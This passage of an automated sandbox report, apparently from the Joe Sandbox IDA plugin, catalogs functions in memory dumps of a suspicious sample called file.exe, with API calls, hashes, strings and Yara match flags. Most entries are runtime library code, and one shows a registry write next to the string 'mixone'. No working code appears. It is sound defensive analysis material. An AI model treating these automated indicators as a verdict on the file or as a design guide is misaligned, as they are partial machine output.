                                                • Instruction ID: 526bd2c442181307887733989819878d768e136a746cf2eec307868f2bd45ee9
                                                • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                                • Instruction Fuzzy Hash: EEB1477180020AEBCF25DFA5C8819AEBBB5EF04314B14416BE815BB292D738DA51CFDD
                                                APIs
                                                • type_info::operator==.LIBVCRUNTIME ref: 04D0B1DA
                                                • ___TypeMatch.LIBVCRUNTIME ref: 04D0B2E8
                                                • _UnwindNestedFrames.LIBCMT ref: 04D0B43A
                                                • CallUnexpected.LIBVCRUNTIME ref: 04D0B455
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                • String ID: csm$csm$csm
                                                • API String ID: 2751267872-393685449
                                                • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                                • Instruction ID: 7b6221219bb55dbb89d748f8856a00264ef97102b8050ef18d9d3324b3a3e2c7
                                                • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                                • Instruction Fuzzy Hash: 42B14671904609EFDF29DFE4C880AAEBBB5FF04314B14C15AE8116B295E770FA51CBA1
                                                APIs
                                                • type_info::operator==.LIBVCRUNTIME ref: 10004250
                                                • ___TypeMatch.LIBVCRUNTIME ref: 1000435E
                                                • _UnwindNestedFrames.LIBCMT ref: 100044B0
                                                • CallUnexpected.LIBVCRUNTIME ref: 100044CB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                • String ID: csm$csm$csm
                                                • API String ID: 2751267872-393685449
                                                • Opcode ID: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                                • Instruction ID: 3d3d7b973083d5502e03e9704e538657a8ad6664bd6ca03923258a49de60437f
                                                • Opcode Fuzzy Hash: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                                • Instruction Fuzzy Hash: C0B180B5C00209DFEF05DF94D881A9EBBB9FF04390F12415AF8116B21ADB31EA51CB99
                                                APIs
                                                • type_info::operator==.LIBVCRUNTIME ref: 04B6C041
                                                • ___TypeMatch.LIBVCRUNTIME ref: 04B6C14F
                                                • _UnwindNestedFrames.LIBCMT ref: 04B6C2A1
                                                • CallUnexpected.LIBVCRUNTIME ref: 04B6C2BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                • String ID: csm$csm$csm
                                                • API String ID: 2751267872-393685449
                                                • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                                • Instruction ID: 1509df7a94b0188fe7ae1ffb6bd3d2e8c151811ca06297b31db7e092e5720e3b
                                                • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                                • Instruction Fuzzy Hash: 3EB18A71800219EFDF15DFA4D8809AEBBB5FF04314F1440AAE896AB215D739FA61CF91
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: _free$___from_strstr_to_strchr
                                                • String ID:
                                                • API String ID: 3409252457-0
                                                • Opcode ID: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
                                                • Instruction ID: d9dcc3e5fe16bdce254290b2b7dc8605e647b21a7cac7c74f5ab9bfc5a2656b0
                                                • Opcode Fuzzy Hash: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
                                                • Instruction Fuzzy Hash: 83510474E04246EFFB10DFB48C85A9E7BE4EF413D0F124169E95497289EB769A00CB51
                                                APIs
                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,04B69DE2), ref: 04B69E10
                                                • GetModuleHandleW.KERNEL32(0041FFC8,?,?,04B69DE2), ref: 04B69E1B
                                                • GetModuleHandleW.KERNEL32(0042000C,?,?,04B69DE2), ref: 04B69E2C
                                                • GetProcAddress.KERNEL32(00000000,00420028), ref: 04B69E3E
                                                • GetProcAddress.KERNEL32(00000000,00420044), ref: 04B69E4C
                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04B69DE2), ref: 04B69E6F
                                                • RtlDeleteCriticalSection.NTDLL(0042D064), ref: 04B69E8B
                                                • CloseHandle.KERNEL32(0042D060,?,?,04B69DE2), ref: 04B69E9B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                • String ID:
                                                • API String ID: 2565136772-0
                                                • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                                • Instruction ID: 237c778da28d3ec3227189ffe2c952334d6fd0e3b115370afc663a24bdc1500b
                                                • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                                • Instruction Fuzzy Hash: 5C017571F40711ABD7205BB4FC09F973AE8EB49B05B504475F906E2161DB78D80BCA68
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: _strrchr
                                                • String ID:
                                                • API String ID: 3213747228-0
                                                • Opcode ID: bf0b0920984447c06244afe43fd9d6a0130e4e86955e3e91be41bedb8128cd91
                                                • Instruction ID: 4a21b80fcc43a582202c6f7144ab3ce64f52356938c116e7343db5097d41ee6d
                                                • Opcode Fuzzy Hash: bf0b0920984447c06244afe43fd9d6a0130e4e86955e3e91be41bedb8128cd91
                                                • Instruction Fuzzy Hash: 57B13672E003559FDB118F65CC81BEF7FA5EF59310F14416BE904AB382D2789A82C7A8
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID: _strrchr
                                                • String ID:
                                                • API String ID: 3213747228-0
                                                • Opcode ID: 40243c521aab70af30abc9ec0642881d9f494199df659fe1a780e76705c17a36
                                                • Instruction ID: 417bccfef4060ed6a3966fa8bbcf6eb7b6f96e728a362a52769359c78c714c5c
                                                • Opcode Fuzzy Hash: 40243c521aab70af30abc9ec0642881d9f494199df659fe1a780e76705c17a36
                                                • Instruction Fuzzy Hash: 74B14772A00295BFFB12CFA8EC81BAE7BA5FF55310F144165ED04AB2A1D674F901C7A0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _strrchr
                                                • String ID:
                                                • API String ID: 3213747228-0
                                                • Opcode ID: 40243c521aab70af30abc9ec0642881d9f494199df659fe1a780e76705c17a36
                                                • Instruction ID: 143d90ba875223aeca4a41e852f491a56e77f475b64ad04eb166117007b8ab15
                                                • Opcode Fuzzy Hash: 40243c521aab70af30abc9ec0642881d9f494199df659fe1a780e76705c17a36
                                                • Instruction Fuzzy Hash: B3B19732A00265AFEF11CF68CC81BBEBFA4EF45345F0441E5E964AB281D374B910C7A0
                                                APIs
                                                • __RTC_Initialize.LIBCMT ref: 1000291D
                                                • ___scrt_uninitialize_crt.LIBCMT ref: 10002937
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: Initialize___scrt_uninitialize_crt
                                                • String ID:
                                                • API String ID: 2442719207-0
                                                • Opcode ID: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                                • Instruction ID: 04769ff959a67eddfc0a91c70c155494b73e6b711ec1a15a155288148215b0b0
                                                • Opcode Fuzzy Hash: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                                • Instruction Fuzzy Hash: 3741F372E05229AFFB21CF68CC41BAF7BA4EB846D0F114119F84467258DB309E419BA1
                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 0040B7F7
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 0040B7FF
                                                • _ValidateLocalCookies.LIBCMT ref: 0040B888
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 0040B8B3
                                                • _ValidateLocalCookies.LIBCMT ref: 0040B908
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 1170836740-1018135373
                                                • Opcode ID: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                                • Instruction ID: 0a5d0bd6c222bbdd43f8b319fa79a96d429a9708f3c046b0ae0cbd11a01f7e51
                                                • Opcode Fuzzy Hash: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                                • Instruction Fuzzy Hash: 11418535A00219DBCF10EF69C885A9EBBA5EF44318F14C17AE8147B3E2D7399905CBD9
                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 04D0ABF7
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 04D0ABFF
                                                • _ValidateLocalCookies.LIBCMT ref: 04D0AC88
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 04D0ACB3
                                                • _ValidateLocalCookies.LIBCMT ref: 04D0AD08
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 1170836740-1018135373
                                                • Opcode ID: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                                • Instruction ID: f3c310302b0c40c20b9b34b855988e141cdf130191ac3f7e6030e8d48a8665a6
                                                • Opcode Fuzzy Hash: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                                • Instruction Fuzzy Hash: 8641A134B00308ABCF10DF68C884B9EBBA5FF44328F15C155E8155B391D775B905CBA5
                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 10003A57
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 10003A5F
                                                • _ValidateLocalCookies.LIBCMT ref: 10003AE8
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 10003B13
                                                • _ValidateLocalCookies.LIBCMT ref: 10003B68
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 1170836740-1018135373
                                                • Opcode ID: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                                • Instruction ID: 53213870faae5245fec6ed73a44d54790f208d332314260de239e107b7581961
                                                • Opcode Fuzzy Hash: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                                • Instruction Fuzzy Hash: 2A41E434A002189FDF02CF68C881A9FBBF9EF453A8F11C065E9149B356C771EA15CB91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: api-ms-$ext-ms-
                                                • API String ID: 0-537541572
                                                • Opcode ID: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                                • Instruction ID: 4a8ea71034e84b8525c0961ad639e20c08c2bf99947945f029ec6b94e21b7784
                                                • Opcode Fuzzy Hash: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                                • Instruction Fuzzy Hash: DC219671E01321EBF722DB648C81A4E37A4FB456E0B214124ED59A7195D778EE00A6E1
                                                APIs
                                                • FreeLibrary.KERNEL32(00000000,?,00413448,00403597,?,00000000,00402809,0040280B,?,004135C1,00000022,FlsSetValue,00422950,00422958,00402809), ref: 004133FA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID: api-ms-$ext-ms-
                                                • API String ID: 3664257935-537541572
                                                • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                                • Instruction ID: 89836d951bc72d4e20e2faa1a52db581b462940ce5fd44a8dff6846afbaeb460
                                                • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                                • Instruction Fuzzy Hash: A3212731B01214EBDB329F21DC44ADB7B68AB41765B200133ED15A73D1DA78EE46C6DC
                                                APIs
                                                  • Part of subcall function 1000C587: _free.LIBCMT ref: 1000C5AC
                                                • _free.LIBCMT ref: 1000C60D
                                                  • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                  • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                • _free.LIBCMT ref: 1000C618
                                                • _free.LIBCMT ref: 1000C623
                                                • _free.LIBCMT ref: 1000C677
                                                • _free.LIBCMT ref: 1000C682
                                                • _free.LIBCMT ref: 1000C68D
                                                • _free.LIBCMT ref: 1000C698
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
                                                • Instruction ID: 1780f257e170a803287b818d598211b5e25d48ac92953e35ea001cf34306b7c8
                                                • Opcode Fuzzy Hash: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
                                                • Instruction Fuzzy Hash: 25115479940B08AAF520EB70CC47FCF7B9CEF457C1F400819B29D76097DA75B6484AA1
                                                APIs
                                                • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 1000B720
                                                • __fassign.LIBCMT ref: 1000B905
                                                • __fassign.LIBCMT ref: 1000B922
                                                • WriteFile.KERNEL32(?,10009A1A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000B96A
                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1000B9AA
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000BA52
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                • String ID:
                                                • API String ID: 1735259414-0
                                                • Opcode ID: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
                                                • Instruction ID: 817bf58f8fa712ded97291eda06853010b29bdec4c6be72b636a35a8a914ce65
                                                • Opcode Fuzzy Hash: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
                                                • Instruction Fuzzy Hash: 9DC1CF75D006989FEB11CFE8C8809EDBBB5EF09354F28816AE855F7245D631AE42CB60
                                                APIs
                                                • GetLastError.KERNEL32(?,?,0040B97B,0040AF1F,0040A730), ref: 0040B992
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040B9A0
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040B9B9
                                                • SetLastError.KERNEL32(00000000,0040B97B,0040AF1F,0040A730), ref: 0040BA0B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: ErrorLastValue___vcrt_
                                                • String ID:
                                                • API String ID: 3852720340-0
                                                • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                                • Instruction ID: c1383cefff0a9c77c0f6256a7d22d0577fd0bc713188e5814d490c4ea7085b9f
                                                • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                                • Instruction Fuzzy Hash: 6D0192727197119EE63427B97CC6A6B2B94EB01778760033BF520752E2EB39480255CC
                                                APIs
                                                • GetLastError.KERNEL32(00000001,?,10003C01,10002DB0,100027A7,?,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8), ref: 10003E08
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003E16
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003E2F
                                                • SetLastError.KERNEL32(00000000,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8,?,00000001,?), ref: 10003E81
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: ErrorLastValue___vcrt_
                                                • String ID:
                                                • API String ID: 3852720340-0
                                                • Opcode ID: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                                • Instruction ID: cea4d4d1ab0609a38d25ccf127c64f3389598815618148a6298b3cccc824aafb
                                                • Opcode Fuzzy Hash: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                                • Instruction Fuzzy Hash: 610124379083A66EF25BC7B49CC964B379AEB0D3F53208329F114410F8EFA29E45A244
                                                APIs
                                                • GetLastError.KERNEL32(?,?,04B6BBE2,04B6B186,04B6A997), ref: 04B6BBF9
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04B6BC07
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04B6BC20
                                                • SetLastError.KERNEL32(00000000,04B6BBE2,04B6B186,04B6A997), ref: 04B6BC72
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLastValue___vcrt_
                                                • String ID:
                                                • API String ID: 3852720340-0
                                                • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                                • Instruction ID: 2a41b152595a7504c53bb8ca46dbe145aae3d74ac4d8e0498f82aa76182e0391
                                                • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                                • Instruction Fuzzy Hash: 3101793620D6219EA73427BD7CC496B2F64E70567872002B9E537D61E1EE5975016144
                                                APIs
                                                • std::_Xinvalid_argument.LIBCPMT ref: 004015D5
                                                  • Part of subcall function 00409842: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0040984E
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,12041A13,00000000,00000000,?,?,0042D884,?,?,?,0042DAF4), ref: 0040160B
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,12041A13,00000000,?,0042D884,?,?,?,0042DAF4), ref: 00401642
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00401757
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                                • String ID: string too long
                                                • API String ID: 2123813255-2556327735
                                                • Opcode ID: 281a2476be6cc453a5ad27d9da9e1dc32d507c6cc5bf7aa10868f271ceef2746
                                                • Instruction ID: 8b29ff92f67febe7d184f40cd986ab90276924f3587203b15f4be4e0e60d2281
                                                • Opcode Fuzzy Hash: 281a2476be6cc453a5ad27d9da9e1dc32d507c6cc5bf7aa10868f271ceef2746
                                                • Instruction Fuzzy Hash: 5E4127B1A00300ABD720AF759C8575BB7B8EF48354F24063AF91AE73D1E775AD0487A9
                                                APIs
                                                • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405903
                                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405925
                                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040594D
                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405956
                                                • Sleep.KERNEL32(000005DC), ref: 00405A90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: CloseCreateOpenSleepValue
                                                • String ID: mixone
                                                • API String ID: 4111408922-3123478411
                                                • Opcode ID: 5956f32b293078b1f23111287794b54aa008f1a70d72d9563616efc3db9a2cf7
                                                • Instruction ID: 36deb0a2def4af7d69c3889f60f670a394a8a5da25757ff3a02b89eea185ed5b
                                                • Opcode Fuzzy Hash: 5956f32b293078b1f23111287794b54aa008f1a70d72d9563616efc3db9a2cf7
                                                • Instruction Fuzzy Hash: F3418571210108AFEB08DF58DC95BEE7B65EF08300F908229F955AB5D1D778E9848F58
                                                Strings
                                                • C:\Users\user\Desktop\file.exe, xrefs: 1000833B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: C:\Users\user\Desktop\file.exe
                                                • API String ID: 0-3695852857
                                                • Opcode ID: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
                                                • Instruction ID: d1df9cd49d1a9d965a935ddcfcfd3b9185eaf4079d6f623355f3cc1fa6217373
                                                • Opcode Fuzzy Hash: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
                                                • Instruction Fuzzy Hash: C821D075A00206BFF710DF61CC8090B779CFF846E47108124FA949215AEB31EF0087A0
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,024FEF0D,0040280B,?,00000000,0041DA7B,000000FF,?,0041055C,08758BC2,?,00410530,00000016), ref: 004105B5
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004105C7
                                                • FreeLibrary.KERNEL32(00000000,?,00000000,0041DA7B,000000FF,?,0041055C,08758BC2,?,00410530,00000016), ref: 004105E9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: d9f390a0c8d24d43879d0675fee7d7aa557a7bdfd7840f409546c87a96f2ba59
                                                • Instruction ID: f4dd53f2cc94282f557b0741292325b7031a84366b21a1c3c136dd1e19965a8c
                                                • Opcode Fuzzy Hash: d9f390a0c8d24d43879d0675fee7d7aa557a7bdfd7840f409546c87a96f2ba59
